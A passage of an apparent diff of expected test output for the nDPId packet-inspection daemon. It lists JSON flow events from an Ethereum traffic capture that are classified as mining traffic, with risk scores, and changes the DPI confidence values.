{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364732,"flow_last_seen":1578508365736,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365919,"flow_last_seen":1578508365951,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364776,"flow_last_seen":1578508365781,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1578508364382,"flow_last_seen":1578508364651,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365408,"flow_last_seen":1578508365790,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":554,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00764{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364654,"flow_last_seen":1578508364729,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365461,"flow_last_seen":1578508365899,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364519,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364421,"flow_last_seen":1578508364694,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 